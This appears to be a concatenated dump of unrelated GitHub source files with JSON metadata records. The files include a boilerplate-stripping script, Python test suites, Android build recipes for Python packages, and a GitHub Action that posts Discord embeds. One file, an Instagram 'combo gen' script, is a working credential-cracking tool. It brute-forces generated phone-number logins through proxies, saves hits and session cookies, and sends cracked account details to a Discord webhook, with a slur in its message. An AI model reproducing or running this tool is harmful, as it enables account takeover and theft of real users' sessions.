C (3) Neither the name of Lawrence Berkeley National Laboratory, U.S.
C Dept. of Energy nor the names of its contributors may be used to endorse
C or promote products derived from this software without specific prior
C written permission.
C
C THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
C "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED
C TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A
C PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER
C OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL,
C EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
C PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR
C PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF
C LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING
C NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
C SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
C
C You are under no obligation whatsoever to provide any bug fixes,
C patches, or upgrades to the features, functionality or performance of
C the source code ("Enhancements") to anyone; however, if you choose to
C make your Enhancements available either publicly, or directly to
C Lawrence Berkeley National Laboratory, without imposing a separate
C written license agreement for such Enhancements, then you hereby grant
C the following license: a non-exclusive, royalty-free perpetual license
C to install, use, modify, prepare derivative works, incorporate into
C other computer software, distribute, and sublicense such Enhancements or
C derivative works thereof, in binary and source code form.
C
C TRADEMARKS. Product and company names mentioned herein may be the
C trademarks of their respective owners. Any rights not expressly granted
C herein are reserved.
C\
""".split('\n'))
g_boilerplate.append(
"""\
C This software is copyright (C) by the Lawrence Berkeley
C National Laboratory. Permission is granted to reproduce
C this software for non-commercial purposes provided that
C this notice is left intact.
C
C It is acknowledged that the U.S. Government has rights to
C this software under Contract DE-AC03-765F00098 between
C the U.S. Department of Energy and the University of
C California.
C
C This software is provided as a professional and academic
C contribution for joint exchange. Thus it is experimental,
C is provided ``as is'', with no warranties of any kind
C whatsoever, no support, no promise of updates, or printed
C documentation. By using this software, you acknowledge
C that the Lawrence Berkeley National Laboratory and
C Regents of the University of California shall have no
C liability with respect to the infringement of other
C copyrights by any part of this software.
C\
""".split('\n'))
def logo( filename ):
chombo = [
'#ifdef CH_LANG_CC',
'/*',
'* _______ __',
'* / ___/ / ___ __ _ / / ___',
'* / /__/ _ \\/ _ \\/ V \\/ _ \\/ _ \\',
'* \\___/_//_/\\___/_/_/_/_.__/\\___/',
"* Please refer to Copyright.txt, in Chombo's root directory.",
'*/',
'#endif']
result = ''
if filename[-4:] == '.ChF':
for i in (8,7,1,0):
del chombo[i]
for line in chombo:
if filename[-4:] == '.ChF':
line = string.replace(line,'*','C')
result += line + '\n'
return result
"""
Close-enough match between line in source file, and line we're looking for.
"""
def goodmatch( str1, str2 ):
gstr1 = str1[1:].strip() # Ignores ^C vs ^!, and number blank spaces after C
gstr2 = str2[1:].strip() # Ignores ^C vs ^!, and number blank spaces after C
return gstr1 == gstr2
def stripBoilerplate( filename ):
result = []
boilerplate_line=0
overall_line=-1
bp_model = None # element of g_boilerplate -- the one found
#
# Insert pointer to copyright notice.
#
result.append( logo(filename) )
#
# Find which line copyright notice ends at, and copy file from that point
# on. If you can't find anything like a copyright notice, then copy the
# entire file.
#
last_line_of_copyright = 0
include_guards = []
text = open(filename).readlines()
for line in text:
overall_line += 1
# Don't lose the include guards, if they're at very top of file:
if( (overall_line < 3)
and ( (-1 != line.find('#ifndef'))
or (-1 != line.find('#define')))):
include_guards.append( line )
if not bp_model:
for bp in g_boilerplate:
if goodmatch( line[:-1], bp[0] ):
bp_model = bp
last_line_of_copyright = overall_line + len(bp_model)
break
if overall_line == 20:
print "Warning:(", filename, ") haven't found boilerplate yet."
break
# Go through once again, this time copying everything from the end of the
# copyright notice.
overall_line = -1
if (last_line_of_copyright != 0) and (len(include_guards)==2):
result += include_guards
if -1 != text[last_line_of_copyright].find( '#endif' ): # matches CH_LANG_CC
text[last_line_of_copyright] = '\n' # we removed.
for iline in range(last_line_of_copyright, len(text)):
result += text[iline]
outfile = open( filename + '.new', 'w' )
for rl in result:
outfile.write(rl)
if __name__ == '__main__':
stripBoilerplate( sys.argv[1] )
``` |
{
"source": "88um/instagram-combo-gen",
"score": 3
} |
#### File: 88um/instagram-combo-gen/main.py
```python
import requests, random, os, uuid, time
class Hack:
def __init__(self):
self.done = 0
self.error = 0
self.secure = 0
self.block = 0
self.webhook = ''#INSERT DISCORD WEBHOOK HERE
self.url = 'https://b.i.instagram.com/api/v1/accounts/login/'
self.headers = {'User-Agent': 'Instagram 172.16.58.3.122 Android (24/5.0; 515dpi; 1440x2416; huawei/google; Nexus 6P; angler; angler; en_US)'}
self.uid = str(uuid.uuid4())
self.banner = """
)\ ( ) ( /( ( (
(((_) )( ( /( ( )\()) ))\ )(
)\___(()\ )(_)) )\((_)\ /((_|()\
((/ __|((_|(_)_ ((_) |(_|_)) ((_)
| (__| '_/ _` / _|| / // -_)| '_|
\___|_| \__,_\__||_\_\\___||_|
by @crackled on tele"""
def clear(self):
os.system('cls' if os.name == 'nt' else 'clear')
print( '……………………………………………………………………………………………………………………………………………………')
print(self.banner)
print( '……………………………………………………………………………………………………………………………………………………')
print(( f"\r \n [=] Hit : {self.done} \n [=] Fail : {self.error} \n [=] Secure : {self.secure}\n [=] Blocked : {self.block}\n [=] User : {self.username} \n [=] Pass : {self.password} "), end='')
def generate(self, proxy):
self.proxy = proxy
users = '0987654321'
us = str(''.join((random.choice(users) for i in range(7))))
self.username = '+98935' + us
self.password = '<PASSWORD>' + us
self.login()
def login(self):
r = requests.session()
if self.proxy:
file = open('proxies.txt').read().splitlines()
prox = random.choice(file)
proxies = {'http': 'http://' + prox, 'https': 'http://' + prox}
r.proxies.update(proxies)
data = {'uuid':self.uid, 'password':<PASSWORD>, 'username':self.username, 'device_id':self.uid, 'from_reg':'false', '_csrftoken':'missing', 'login_attempt_countn':'0'}
send = r.post(self.url,headers=self.headers,data=data)
text = send.text
if 'logged_in_user' in text:
self.done+=1
Json = send.json()
id = send.cookies['sessionid']
with open('hit.txt','a') as f:
f.write(f'{self.username}:{self.password}:{id}\n')
with open('sessions.txt','a') as f:
f.write(f'{id}\n')
user = Json['logged_in_user']['username']
self.disc(id,user)
elif "challenge_required" in text:
with open('secure.txt','a') as f:
f.write(f'{self.username}:{self.password}')
self.secure+=1
elif send.status_code == 429:
self.block+=1
else:
self.error+=1
self.clear()
def disc(self,id, username):
head = {'HOST':'www.instagram.com', 'KeepAlive':'True', 'user-agent':'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/47.0.2526.73 Safari/537.36', 'Cookie':f'sessionid={id}', 'Accept':'*/*', 'ContentType':'application/x-www-form-urlencoded', 'X-Requested-With':'XMLHttpRequest', 'X-IG-App-ID':'936619743392459', 'X-Instagram-AJAX':'missing', 'X-CSRFToken':'missing', 'Accept-Language':'en-US,en;q=0.9'}
url_id = f"https://www.instagram.com/{username}/?__a=1"
try:
req_id = requests.get(url_id, headers=head).json()
name = str(req_id['graphql']['user']['full_name'])
idd = str(req_id['graphql']['user']['id'])
followes = str(req_id['graphql']['user']['edge_followed_by']['count'])
following = str(req_id['graphql']['user']['edge_follow']['count'])
re = requests.get(f"https://o7aa.pythonanywhere.com/?id={idd}")
ree = re.json()
dat = ree['data']
webh = {"content":f" New Hit Nigga: @{username}!","embeds":[{"title":f"Successfully Cracked {username}!","description":f"Status: SUCCESS\n-\nUser ID: {idd}\n-\nName: {name}\n-\nFollowers: {followes}\n-\nFollowing: {following}\n-\nAge: {dat}\n","url":f"https://instagram.com/{username}","color":14177041}],"username":"Cracker Bot.","avatar_url":"https://www.pandasecurity.com/en/mediacenter/src/uploads/2019/07/pandasecurity-How-do-hackers-pick-their-targets.jpg"}
requests.post(self.webhook,json=webh)
return True
except:
return False
if __name__ == '__main__':
ig = Hack()
print(ig.banner + '\n')
choice = input('[+] Use Proxies? (Y/N): ')
if choice == 'y' or choice == 'Y':proxy=True;print('\n [!] Proxies Activated! ');time.sleep(3)
else:proxy=False;print('\n [!] Running without proxies! ');time.sleep(3)
while True:
ig.generate(proxy)
``` |
{
"source": "8916/CloudFunction",
"score": 2
} |
#### File: python/samples/req.py
```python
def onRequest(request, response, modules):
response.send({
"urlParams": request.getQueryParams(),
"bodyParams": request.getParams(),
"headers": request.getHeaders(),
"method": request.getMethod(),
"path": request.getPath()
})
``` |
{
"source": "89258085058/software_testing",
"score": 3
} |
#### File: software_testing/test/test_add_and_dell_contact_to_group.py
```python
from fixture.orm import *
import random
def test_add_contact_to_group(app, orm):
contact = None
add_to_group = None
all_groups = orm.get_group_list()
if len(all_groups) == 0:
app.group.add_personal_information(Contact(firstname="Alexandr", lastname="Gorelov"))
all_groups = orm.get_group_list()
for group in all_groups:
contacts = orm.get_contacts_not_in_group(group)
if len(contacts) > 0:
contact = contacts[0]
add_to_group = group
break
if contact is None:
app.contact.add_personal_information(Contact(firstname="test", lastname="test"))
contacts = sorted(orm.get_contact_list(), key=Contact.id_or_max)
contact = contacts[len(contacts)-1]
old_contacts = orm.get_contacts_in_group(add_to_group)
app.contact.add_contact_to_group(contact, add_to_group)
new_contacts = orm.get_contacts_in_group(add_to_group)
assert len(old_contacts) + 1 == len(new_contacts) and new_contacts.count(contact) == 1
def test_del_random_contact_to_random_group(app, orm):
contact = None
add_to_group = None
all_groups = orm.get_group_list()
if len(all_groups) == 0:
app.group.add_personal_information(Contact(firstname="Alexandr1", lastname="Gorelov1"))
app.contact.add_contact_to_group(random.choice(orm.get_contact_list()), random.choice(orm.get_group_list()))
all_groups = orm.get_group_list()
for group in all_groups:
contacts = orm.get_contacts_in_group(group)
if len(contacts) > 0:
contact = contacts[0]
add_to_group = group
break
if contact is None and orm.get_contact_list() == 0:
app.contact.add_personal_information(Contact(firstname="test1", lastname="test1"))
contact = orm.get_contact_list()[0]
add_to_group = random.choice(orm.get_group_list())
app.contact.add_contact_to_group(contact, add_to_group)
elif contact is None and orm.get_contact_list() != 0:
contact = random.choice(orm.get_contact_list())
add_to_group = random.choice(orm.get_group_list())
app.contact.add_contact_to_group(contact, add_to_group)
old_contacts = orm.get_contacts_in_group(add_to_group)
app.contact.del_contact_to_group(contact, add_to_group)
new_contacts = orm.get_contacts_in_group(add_to_group)
assert len(old_contacts) - 1 == len(new_contacts) and new_contacts.count(contact) == 0
```
#### File: software_testing/test/test_del_contact.py
```python
import random
from model.contact import Contact
import allure
def test_delete_some_contact(app, db, check_ui):
if len(db.get_contact_list()) == 0:
app.contact.add_personal_information(Contact(firstname="", lastname="", homephone="", mobilephone="",
workphone="", secondaryphone="", Address="", email="", email2="", email3=""))
with allure.step('Given a non-empty contact list'):
old_cantacts = db.get_contact_list()
with allure.step('Given a random contact from the list'):
contact = random.choice(old_cantacts)
with allure.step('When I delete the contact from the list'):
app.contact.del_contact_by_id(contact.id)
with allure.step('Then the new contact list is equal to the old list without deleted contact'):
new_contacts = db.get_contact_list()
old_cantacts.remove(contact)
if check_ui:
assert sorted(new_contacts, key=Contact.id_or_max) == sorted(app.contact.get_contact_list(), key=Contact.id_or_max)
``` |
{
"source": "892768447/python3-android",
"score": 2
} |
#### File: pybuild/packages/bzip2.py
```python
from ..ndk import ndk
from ..source import GitSource
from ..package import BasePackage
from ..util import android_api_level, target_arch
class BZip2Source(GitSource):
def __init__(self):
super().__init__('https://gitlab.com/federicomenaquintero/bzip2')
def get_version(self):
if not self._version and self.source_dir.exists():
rev_count = self.run_in_source_dir([
'git', 'rev-list', '--count', 'HEAD'
], mode='result').strip()
rev = self.run_in_source_dir([
'git', 'rev-parse', '--short', 'HEAD'
], mode='result').strip()
self._version = f'r{rev_count}.{rev}'
return self._version
class BZip2(BasePackage):
source = BZip2Source()
def prepare(self):
self.run_with_env([
'cmake',
f'-DCMAKE_TOOLCHAIN_FILE={ndk.cmake_toolchain}',
f'-DANDROID_ABI={target_arch().CMAKE_ANDROID_ABI}',
f'-DANDROID_PLATFORM=android-{android_api_level()}',
'-DENABLE_STATIC_LIB=ON',
'-DENABLE_SHARED_LIB=OFF',
'-DCMAKE_INSTALL_PREFIX=/usr',
'.'
])
def build(self):
self.run_with_env(['make'])
self.run_with_env(['make', 'install', f'DESTDIR={self.destdir()}'])
```
#### File: pybuild/packages/ncurses.py
```python
import re
from ..source import GitSource
from ..package import Package
from ..util import target_arch
class NCursesSource(GitSource):
def __init__(self):
super().__init__('https://github.com/ThomasDickey/ncurses-snapshots')
def get_version(self):
v = super().get_version()
if v:
return re.sub(r'v(\d+)_(\d+)_(\d+)', r'\1.\2-\3', v)
class NCurses(Package):
source = NCursesSource()
def prepare(self):
self.run_with_env([
'./configure',
'--prefix=/usr',
f'--host={target_arch().ANDROID_TARGET}',
'--without-ada',
'--enable-widec',
'--without-shared',
'--with-normal',
'--without-debug',
'--without-cxx-binding',
'--enable-warnings',
'--disable-stripping',
])
def build(self):
self.run(['make'])
self.run(['make', 'install', f'DESTDIR={self.destdir()}'])
```
#### File: pybuild/packages/python.py
```python
from .. import env
from ..source import GitSource
from ..package import Package
from ..patch import LocalPatch
from ..util import target_arch
class PythonSource(GitSource):
def __init__(self):
super().__init__('https://github.com/python/cpython/')
def get_version(self):
if not self._version and self.source_dir.exists():
rev_count = self.run_in_source_dir([
'git', 'rev-list', '--count', 'HEAD'
], mode='result').strip()
rev = self.run_in_source_dir([
'git', 'rev-parse', '--short', 'HEAD'
], mode='result').strip()
self._version = f'3.9.0a0.r{rev_count}.{rev}'
return self._version
class Python(Package):
source = PythonSource()
patches = [
LocalPatch('cppflags'),
LocalPatch('skip-build'),
LocalPatch('lld-compatibility'),
]
dependencies = list(env.packages)
def init_build_env(self):
super().init_build_env()
self.env['CONFIG_SITE'] = self.filesdir / 'config.site'
ldflags = list(self.env['LDFLAGS'])
ldflags.pop(ldflags.index('-pie'))
self.env['LDFLAGS'] = list(ldflags)
def prepare(self):
self.run(['autoreconf', '--install', '--verbose', '--force'])
self.run_with_env([
'./configure',
'--prefix=/usr',
'--enable-shared',
'--host=' + target_arch().ANDROID_TARGET,
# CPython requires explicit --build
'--build=x86_64-linux-gnu',
'--disable-ipv6',
'--with-system-ffi',
'--with-system-expat',
'--without-ensurepip',
])
def build(self):
self.run(['make'])
self.run(['make', 'altinstall', f'DESTDIR={self.destdir()}'])
```
#### File: pybuild/packages/zlib.py
```python
from ..source import URLSource
from ..package import Package
from ..patch import LocalPatch
from ..util import target_arch
class ZLib(Package):
version = '1.2.11'
source = URLSource(f'https://zlib.net/zlib-{version}.tar.gz', sig_suffix='.asc')
validpgpkeys = ['5ED46A6721D365587791E2AA783FCD8E58BCAFBA']
patches = [
LocalPatch('fix-ldflags'),
]
def init_build_env(self):
super().init_build_env()
self.env.update({
'CHOST': f'{target_arch().ANDROID_TARGET}-',
'CFLAGS': self.env['CPPFLAGS'] + self.env['CFLAGS'],
})
def prepare(self):
self.run_with_env([
'./configure',
'--prefix=/usr',
'--static',
])
def build(self):
self.run(['make'])
self.run(['make', 'install', f'DESTDIR={self.destdir()}'])
``` |
{
"source": "893091483/Discord-embed",
"score": 3
} |
#### File: Discord-embed/github_status_embed/types.py
```python
from __future__ import annotations
import collections
import dataclasses
import enum
import json
import logging
import typing
log = logging.getLogger(__name__)
MIN_EMBED_FIELD_LENGTH = 20
class MissingActionFile(FileNotFoundError):
"""Raised when the Action file can't be located."""
class InvalidArgument(TypeError):
"""Raised when an argument is of the wrong type."""
class MissingArgument(TypeError):
"""Raised when a required argument was missing from the inputs."""
def __init__(self, arg_name: str) -> None:
msg = "\n\n".join((
f"missing non-null value for argument `{arg_name}`",
"Hint: incorrect context paths like `github.non_existent` return `null` silently.",
))
super().__init__(msg)
class TypedDataclass:
"""Convert the dataclass arguments to the annotated types."""
optional = False
def __init__(self, *args, **kwargs):
raise NotImplementedError
@classmethod
def __init_subclass__(cls, optional: bool = False, **kwargs) -> None:
"""Keep track of whether or not this class is optional."""
super().__init_subclass__(**kwargs)
cls.optional = optional
@classmethod
def from_arguments(cls, arguments: typing.Dict[str, str]) -> typing.Optional[TypedDataclass]:
"""Convert the attributes to their annotated types."""
typed_attributes = typing.get_type_hints(cls)
# If we have an optional dataclass and none of the values were provided,
# return `None`. The reason is that optional classes should either be
# fully initialized, with all values, or not at all. If we observe at
# least one value, we assume that the intention was to provide them
# all.
if cls.optional and all(arguments.get(attr, "") == "" for attr in typed_attributes):
return None
# Extract and convert the keyword arguments needed for this data type.
kwargs = {}
for attribute, _type in typed_attributes.items():
value = arguments.pop(attribute, None)
# At this point, we should not have any missing arguments any more.
if value is None:
raise MissingArgument(attribute)
try:
if issubclass(_type, enum.Enum):
value = _type[value.upper()]
else:
value = _type(value)
if isinstance(value, collections.Sized) and len(value) == 0:
raise ValueError
except (ValueError, KeyError):
raise InvalidArgument(f"invalid value for `{attribute}`: {value}") from None
else:
kwargs[attribute] = value
return cls(**kwargs)
class WorkflowStatus (enum.Enum):
"""An Enum subclass that represents the workflow status."""
SUCCESS = {"verb": "succeeded", "adjective": "Successful", "color": 38912}
FAILURE = {"verb": "failed", "adjective": "Failed", "color": 16525609}
CANCELLED = {"verb": "was cancelled", "adjective": "Cancelled", "color": 6702148}
@property
def verb(self) -> str:
"""Return the verb associated with the status."""
return self.value["verb"]
@property
def color(self) -> int:
"""Return the color associated with the status."""
return self.value["color"]
@property
def adjective(self) -> str:
"""Return the adjective associated with the status."""
return self.value["adjective"]
@dataclasses.dataclass(frozen=True)
class Workflow(TypedDataclass):
"""A dataclass to hold information about the executed workflow."""
workflow_name: str
run_id: int
run_number: int
status: WorkflowStatus
repository: str
actor: str
ref: str
sha: str
@property
def name(self) -> str:
"""A convenience getter for the Workflow name."""
return self.workflow_name
@property
def id(self) -> int:
"""A convenience getter for the Workflow id."""
return self.run_id
@property
def number(self) -> int:
"""A convenience getter for the Workflow number."""
return self.run_number
@property
def url(self) -> str:
"""Get the url to the Workflow run result."""
return f"https://github.com/{self.repository}/actions/runs/{self.run_id}"
@property
def actor_url(self) -> str:
"""Get the url to the Workflow run result."""
return f"https://github.com/{self.actor}"
@property
def short_sha(self) -> str:
"""Return the short commit sha."""
return self.sha[:7]
@property
def commit_url(self) -> str:
"""Return the short commit sha."""
return f"https://github.com/{self.repository}/commit/{self.sha}"
@property
def repository_owner(self) -> str:
"""Extract and return the repository owner from the repository field."""
owner, _, _name = self.repository.partition("/")
return owner
@property
def repository_name(self) -> str:
"""Extract and return the repository owner from the repository field."""
_owner, _, name = self.repository.partition("/")
return name
@dataclasses.dataclass(frozen=True)
class Webhook(TypedDataclass):
"""A simple dataclass to hold information about the target webhook."""
webhook_token: str
@property
def id(self) -> int:
"""Return the snowflake ID of the webhook."""
return int(self.webhook_token.split("/")[5])
@property
def token(self) -> str:
"""Return the token of the webhook."""
return self.webhook_token.split("/")[6]
@property
def url(self) -> str:
"""Return the endpoint to execute this webhook."""
return f"https://canary.discord.com/api/webhooks/{self.id}/{self.token}"
@dataclasses.dataclass(frozen=True)
class PullRequest(TypedDataclass, optional=True):
"""
Dataclass to hold the PR-related arguments.
The attributes names are equal to argument names in the GitHub Actions
specification to allow for helpful error messages. To provide a convenient
public API, property getters were used with less redundant information in
the naming scheme.
"""
pr_author_login: str
pr_number: int
pr_title: str
pr_source: str
@classmethod
def from_payload(cls, arguments: typing.Dict[str, str]) -> typing.Optional[PullRequest]:
"""Create a Pull Request instance from Pull Request Payload JSON."""
# Safe load the JSON Payload provided as a command line argument.
raw_payload = arguments.pop('pull_request_payload').replace("\\", "\\\\")
log.debug(f"Attempting to parse PR Payload JSON: {raw_payload!r}.")
try:
payload = json.loads(raw_payload)
except json.JSONDecodeError:
log.debug("Failed to parse JSON, dropping down to empty payload")
payload = {}
else:
log.debug("Successfully parsed parsed payload")
# If the payload contains multiple PRs in a list, use the first one.
if isinstance(payload, list):
log.debug("The payload contained a list, extracting first PR.")
payload = payload[0] if payload else {}
if not payload:
log.warning("PR payload could not be parsed, attempting regular pr arguments.")
return cls.from_arguments(arguments)
# Get the target arguments from the payload, yielding similar results
# when keys are missing as to when their corresponding arguments are
# missing.
arguments["pr_author_login"] = payload.get('user', {}).get('login', '')
arguments["pr_number"] = payload.get('number', '')
arguments["pr_title"] = payload.get('title', '')
arguments["pr_source"] = payload.get('head', {}).get('label', '')
return cls.from_arguments(arguments)
@property
def author(self) -> str:
"""Return the `pr_author_login` field."""
return self.pr_author_login
@property
def author_url(self) -> str:
"""Return a URL for the author's profile."""
return f"https://github.com/{self.pr_author_login}"
@property
def number(self) -> int:
"""Return the `pr_number`."""
return self.pr_number
@property
def title(self) -> str:
"""Return the title of the PR."""
return self.pr_title
def shortened_source(self, length: int, owner: typing.Optional[str] = None) -> str:
"""Returned a shortened representation of the source branch."""
pr_source = self.pr_source
# This removes the owner prefix in the source field if it matches
# the current repository. This means that it will only be displayed
# when the PR is made from a branch on a fork.
if owner:
pr_source = pr_source.removeprefix(f"{owner}:")
# Truncate the `pr_source` if it's longer than the specified length
length = length if length >= MIN_EMBED_FIELD_LENGTH else MIN_EMBED_FIELD_LENGTH
if len(pr_source) > length:
stop = length - 3
pr_source = f"{pr_source[:stop]}..."
return pr_source
@dataclasses.dataclass(frozen=True)
class Issue(TypedDataclass, optional=True):
"""
Dataclass to hold the Issue-related arguments.
The attributes names are equal to argument names in the GitHub Actions
specification to allow for helpful error messages. To provide a convenient
public API, property getters were used with less redundant information in
the naming scheme.
"""
issue_author_login: str
issue_number: int
issue_title: str
issue_status: str
@classmethod
def from_payload(cls, arguments: typing.Dict[str, str]) -> typing.Optional[Issue]:
"""Create a issue instance and pop out pull_request_payload arguement."""
raw_payload = arguments.pop('pull_request_payload').replace("\\", "\\\\")
log.debug(f"Attempting to parse PR Payload JSON: {raw_payload!r}.")
try:
payload = json.loads(raw_payload)
except json.JSONDecodeError:
log.debug("Failed to parse JSON, dropping down to empty payload")
payload = {}
else:
log.debug("Successfully parsed parsed payload")
# If the payload contains multiple PRs in a list, use the first one.
if isinstance(payload, list):
log.debug("The payload contained a list, extracting first Issue.")
payload = payload[0] if payload else {}
if not payload:
return cls.from_arguments(arguments)
# Get the target arguments from the payload, yielding similar results
# when keys are missing as to when their corresponding arguments are
# missing.
arguments["issue_author_login"] = payload.get('user', {}).get('login', '')
arguments["issue_number"] = payload.get('number', '')
arguments["issue_title"] = payload.get('title', '')
arguments["issue_status"] = payload.get('state', '')
return cls.from_arguments(arguments)
@property
def author(self) -> str:
"""Return the `issue_author_login` field."""
return self.issue_author_login
@property
def author_url(self) -> str:
"""Return a URL for the author's profile."""
return f"https://github.com/{self.issue_author_login}"
@property
def number(self) -> int:
"""Return the `pr_number`."""
return self.issue_number
@property
def title(self) -> str:
"""Return the title of the PR."""
return self.issue_title
@property
def status(self) -> str:
"""Return the title of the PR."""
return self.issue_status
class AllowedMentions(typing.TypedDict, total=False):
"""A TypedDict to represent the AllowedMentions in a webhook payload."""
parse: typing.List[str]
users: typing.List[str]
roles: typing.List[str]
replied_user: bool
class EmbedField(typing.TypedDict, total=False):
"""A TypedDict to represent an embed field in a webhook payload."""
name: str
value: str
inline: bool
class EmbedFooter(typing.TypedDict, total=False):
"""A TypedDict to represent an embed footer in a webhook payload."""
text: str
icon_url: str
proxy_icon_url: str
class EmbedThumbnail(typing.TypedDict, total=False):
"""A TypedDict to represent an embed thumbnail in a webhook payload."""
url: str
proxy_url: str
height: str
width: str
class EmbedProvider(typing.TypedDict, total=False):
"""A TypedDict to represent an embed provider in a webhook payload."""
name: str
url: str
class EmbedAuthor(typing.TypedDict, total=False):
"""A TypedDict to represent an embed author in a webhook payload."""
name: str
url: str
icon_url: str
proxy_icon_url: str
class EmbedVideo(typing.TypedDict, total=False):
"""A TypedDict to represent an embed video in a webhook payload."""
url: str
height: str
width: str
class EmbedImage(typing.TypedDict, total=False):
"""A TypedDict to represent an embed image in a webhook payload."""
url: str
proxy_url: str
height: str
width: str
class Embed(typing.TypedDict, total=False):
"""A TypedDict to represent an embed in a webhook payload."""
title: str
type: str
description: str
url: str
timestamp: str
color: int
footer: EmbedFooter
image: EmbedImage
thumbnail: EmbedThumbnail
video: EmbedVideo
provider: EmbedProvider
author: EmbedAuthor
fields: typing.List[EmbedField]
class WebhookPayload(typing.TypedDict, total=False):
"""A TypedDict to represent the webhook payload itself."""
content: str
username: str
avatar_url: str
tts: bool
file: bytes
embeds: typing.List[Embed]
payload_json: str
allowed_mentions: AllowedMentions
```
#### File: Discord-embed/github_status_embed/webhook.py
```python
import json
import logging
import typing
import requests
from github_status_embed import types
log = logging.getLogger(__name__)
EMBED_DESCRIPTION = "UCF Actions run [{run_id}]({run_url}) {status_verb}."
PULL_REQUEST_URL = "https://github.com/{repository}/pull/{number}"
ISSUE_URL = "https://github.com/{repository}/issues/{number}"
WEBHOOK_USERNAME = "UCF Actions"
WEBHOOK_AVATAR_URL = (
"https://raw.githubusercontent.com/"
"893091483/Discord-embed/main/"
"ucf-golden-knights-logo.png"
)
FIELD_CHARACTER_BUDGET = 60
def get_payload_pull_request(
workflow: types.Workflow, pull_request: types.PullRequest
) -> types.WebhookPayload:
"""Create a WebhookPayload with information about a Pull Request."""
# Calculate the character budget for the Source Branch field
author = pull_request.pr_author_login
workflow_number = f"{workflow.name} #{workflow.number}"
characters_left = FIELD_CHARACTER_BUDGET - len(author) - len(workflow_number)
fields = [
types.EmbedField(
name="PR Author",
value=f"[{author}]({pull_request.author_url})",
inline=True,
),
types.EmbedField(
name="Repository",
value=f"[{workflow.repository}](https://github.com/{workflow.repository})",
inline=True,
),
types.EmbedField(
name="Source Branch",
value=f"[{pull_request.shortened_source(characters_left, owner=workflow.repository_owner)}](https://github.com/{workflow.repository}/tree/{pull_request.shortened_source(characters_left, owner=workflow.repository_owner)})",
inline=True,
),
]
embed = types.Embed(
title=(
f"New Pull Request: "
f"#{pull_request.number} {pull_request.title}"
),
description=EMBED_DESCRIPTION.format(
run_id=workflow.id, run_url=workflow.url, status_verb=workflow.status.verb,
),
url=PULL_REQUEST_URL.format(
repository=workflow.repository, number=pull_request.number
),
color="12388591",
fields=fields,
)
webhook_payload = types.WebhookPayload(
username=WEBHOOK_USERNAME,
avatar_url=WEBHOOK_AVATAR_URL,
embeds=[embed]
)
return webhook_payload
def get_payload_issue(
workflow: types.Workflow, issue: types.Issue
) -> types.WebhookPayload:
"""Create a WebhookPayload with information about a Pull Request."""
# Calculate the character budget for the Source Branch field
print(type(issue))
author = issue.issue_author_login
workflow_number = f"{workflow.name} #{workflow.number}"
status = issue.issue_status
fields = [
types.EmbedField(
name="Issue Author",
value=f"[{author}]({issue.author_url})",
inline=True,
),
types.EmbedField(
name="Repository",
value=f"[{workflow.repository}](https://github.com/{workflow.repository})",
inline=True,
),
types.EmbedField(
name="Issue Status ",
value=f"[{status}]({workflow.url})",
inline=True,
),
]
if issue.issue_status == "open":
embed = types.Embed(
title=(
f"New Issue: "
f"#{issue.number} {issue.title}"
),
description=EMBED_DESCRIPTION.format(
run_id=workflow.id, run_url=workflow.url, status_verb=workflow.status.verb,
),
url=ISSUE_URL.format(
repository=workflow.repository, number=issue.number
),
color="10879022",
fields=fields,
)
else:
embed = types.Embed(
title=(
f"Closed Issue: "
f"#{issue.number} {issue.title}"
),
description=EMBED_DESCRIPTION.format(
run_id=workflow.id, run_url=workflow.url, status_verb=workflow.status.verb,
),
url=ISSUE_URL.format(
repository=workflow.repository, number=issue.number
),
color=workflow.status.color,
fields=fields,
)
webhook_payload = types.WebhookPayload(
username=WEBHOOK_USERNAME,
avatar_url=WEBHOOK_AVATAR_URL,
embeds=[embed]
)
return webhook_payload
def get_payload(workflow: types.Workflow) -> types.WebhookPayload:
"""Create a WebhookPayload with information about a generic Workflow run."""
embed_fields = [
types.EmbedField(
name="Actor",
value=f"[{workflow.actor}]({workflow.actor_url})",
inline=True,
),
types.EmbedField(
name="Repository",
value=f"[{workflow.repository}](https://github.com/{workflow.repository})",
inline=True,
),
types.EmbedField(
name="Commit",
value=f"[{workflow.short_sha}]({workflow.commit_url})",
inline=True,
),
]
embed = types.Embed(
title=(
f"New Commit by: "
f"{workflow.actor}"
),
description=EMBED_DESCRIPTION.format(
run_id=workflow.id, run_url=workflow.url, status_verb=workflow.status.verb,
),
url=workflow.url,
color="8381936",
fields=embed_fields,
)
webhook_payload = types.WebhookPayload(
username=WEBHOOK_USERNAME,
avatar_url=WEBHOOK_AVATAR_URL,
embeds=[embed]
)
return webhook_payload
def send_webhook(
workflow: types.Workflow,
webhook: types.Webhook,
pull_request: typing.Optional[types.PullRequest],
issue: typing.Optional[types.Issue],
dry_run: bool = False,
) -> bool:
"""Send an embed to specified webhook."""
if issue is not None:
log.debug("Creating payload for Issue Check")
payload = get_payload_issue(workflow, issue)
elif pull_request is not None:
log.debug("Creating payload for Pull Request Check")
payload = get_payload_pull_request(workflow, pull_request)
else:
log.debug("Creating payload for non-Pull Request event")
payload = get_payload(workflow)
log.debug("Generated payload:\n%s", json.dumps(payload, indent=4))
if dry_run:
return True
response = requests.post(webhook.url, json=payload)
log.debug(f"Response: [{response.status_code}] {response.reason}")
if response.ok:
print(f"[status: {response.status_code}] Successfully delivered webhook payload!")
else:
# Output an error message using the GitHub Actions error command format
print(
"::error::Discord webhook delivery failed! "
f"(status: {response.status_code}; reason: {response.reason})"
)
return response.ok
``` |
{
"source": "89453728/backlogbot",
"score": 2
} |
#### File: backlogbot/src/main.py
